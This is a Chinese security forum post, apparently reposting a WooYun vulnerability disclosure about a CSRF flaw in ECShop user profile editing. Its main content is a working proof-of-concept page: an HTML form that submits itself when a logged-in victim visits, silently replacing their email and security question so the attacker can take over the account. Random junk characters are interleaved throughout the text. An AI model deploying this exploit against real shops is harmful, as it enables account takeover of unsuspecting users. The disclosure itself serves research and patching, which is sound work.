找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1938|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
; S; M* Q! P1 q7 k5 ~6 ^ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现& l9 X: w( z* n# y# x7 X; ~- S
. C+ [$ F6 @& I
Demo For:http://www.wooyun.org/bug.php?action=view&id=3955 u: ]+ t+ @: S3 a; A/ _

% I# J5 q& K) S- v详细说明:
" ~. U! `6 @) d# F+ P$ U8 P' X) v# E利用csrf和xss可以突破官方所说的“障碍”
7 [, q& O2 T( B) K( Rxss版本已经有人说明
2 Z6 E- b' ]1 t5 _, T这里给出csrf版本
$ Z2 g2 `+ g7 w  Z" ]1 r. s2 P6 H7 }
漏洞证明:
4 q" B5 @6 c9 Q9 }* K: ^( x5 Q- v<html>. E9 X5 {# m3 a4 s- f. H" n4 N; g
<body>
& a3 L4 D5 V* o% \& p! r, I<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
1 u9 g5 M$ M/ v# G; L<INPUT TYPE="text" NAME="email" value="hack@wooyun.org"># Q  r6 _. W( L0 q/ P8 D6 s0 F
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
$ ?3 c8 y* w% j4 h<INPUT TYPE="text" NAME="sel_question" value="ecshop">! h% F. e' j, P! y$ W8 J
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
: P- X& ?8 h" {6 i# \% S( f/ [</body>
5 L/ E( _7 A2 q0 Z9 q, h<script>
1 \, a' R% @3 ]  bdocument.forms[0].submit();8 m: k/ Q# Z2 `. w% O) p
</script>. u5 ?0 l6 L. T2 z( M. O( C
</html>
6 ?9 L# f; S8 Y& u构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
2 R$ B, L2 ?$ m9 |& w( z
0 S% E5 ?! u& W+ u0 N0 ?- L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表